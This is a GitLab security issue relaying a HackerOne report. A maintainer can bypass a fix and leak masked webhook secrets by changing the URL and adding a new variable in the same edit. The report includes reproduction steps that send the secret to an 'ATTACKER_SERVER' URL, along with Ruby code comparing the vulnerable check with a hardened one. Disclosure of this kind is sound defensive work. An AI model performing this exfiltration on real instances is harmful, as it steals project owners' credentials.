  • #391685
Closed
Issue created Feb 15, 2023 by GitLab SecurityBot (@gitlab-securitybot), Reporter

Maintainer can leak masked webhook secrets by adding a new parameter to the webhook URL to bypass the newly added validation logic

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1871136 by 0xn3va on 2023-02-12, assigned to @rshambhuni:

Report

Summary

There is a vulnerability #385118 (closed) that was fixed and disclosed recently. The fix adds an extra check in case the URL changes:

Commit: https://gitlab.com/gitlab-org/gitlab/-/commit/7f34991ae36f1804610ba9980e31191394c8b208

  # ...
  before_validation :reset_url_variables, unless: ->(hook) { hook.is_a?(ServiceHook) }

  # ...
  def reset_url_variables
    self.url_variables = {} if url_changed? && !encrypted_url_variables_changed?
  end

However, the guard in reset_url_variables evaluates to false when the URL variables have also been changed, so the reset is skipped. This allows bypassing the check by adding a new variable in the same edit that modifies the URL.
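As an added example (not GitLab's code), the callback above is modelled in plain Ruby next to a hardened variant that drops every previously saved variable whenever the URL changes; HookRecord, its save! method and the hand-rolled url_changed? / url_variables_changed? dirty tracking are assumptions standing in for the ActiveRecord model and its encrypted_url_variables_changed? helper.

```ruby
# Added example (not GitLab code): plain-Ruby model of the WebHook callback.
# HookRecord and its hand-rolled dirty tracking are assumptions standing in
# for the ActiveRecord model and its url_changed? / *_changed? helpers.
class HookRecord
  attr_accessor :url, :url_variables

  def initialize(url:, url_variables:)
    @url = url
    @url_variables = url_variables.dup
    save!
  end

  def save!
    @saved_url = @url
    @saved_url_variables = @url_variables.dup
  end

  def url_changed?
    @url != @saved_url
  end

  def url_variables_changed?
    @url_variables != @saved_url_variables
  end

  # Check as quoted in the report: the whole reset is skipped when the
  # variables hash was edited too, so an added variable keeps the old secret.
  def reset_url_variables_vulnerable
    self.url_variables = {} if url_changed? && !url_variables_changed?
  end

  # Hardened variant (assumption, not GitLab's actual fix): once the URL
  # changes, only variables introduced in this edit survive.
  def reset_url_variables_hardened
    return unless url_changed?
    self.url_variables = url_variables.reject { |name, _| @saved_url_variables.key?(name) }
  end
end

# Replays the edit flow from the report: a masked URL is saved, then a later
# edit swaps the host and adds an unrelated variable in the same save.
# Returns the variable names still stored after the given reset callback ran.
def variables_after_edit(reset_method)
  hook = HookRecord.new(url: 'https://example.com?token={TOKEN}',
                        url_variables: { 'TOKEN' => 'secret-token' }) # constructed
  hook.url = 'https://other.example?token={TOKEN}&a={A}' # constructed
  hook.url_variables = hook.url_variables.merge('A' => 'aaaaa')
  hook.public_send(reset_method)
  hook.url_variables.keys.sort
end
```

With the quoted check, TOKEN survives the edit; with the hardened reset only the newly added variable remains, so an interpolated URL can no longer carry the earlier secret to a changed host.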

Steps to reproduce

As a project owner

  1. Create a project
  2. Add another user to the project as a maintainer
  3. Go to Settings > Webhooks
  4. Put the URL https://example.com?token=secret-token
  5. Click to add a mask
  6. Add the value secret-token with the replacement TOKEN
  7. Click save for the webhook

As a maintainer

  1. Open the project
  2. Go to Settings > Webhooks
  3. Click edit on the webhook
  4. Edit the URL to your controlled server like that: https://<ATTACKER_SERVER>?token={TOKEN}&a=aaaaa
  5. Add the value aaaaa with the replacement A
  6. Save the webhook
  7. Now click Test to send a request
  8. Check your server logs; it will contain the secret in plain text

Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

What is the current bug behavior?

Adding or deleting a new secret does not reset the previously saved ones

What is the expected correct behavior?

Adding or deleting a new secret resets the previously saved ones

Relevant logs and/or screenshots

Screen_Recording_2023-02-12_at_12.55.50.mov

Output of checks

This bug happens on GitLab.com

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screen_Recording_2023-02-12_at_12.55.50.mov

How To Reproduce

Please add reproducibility information to this section: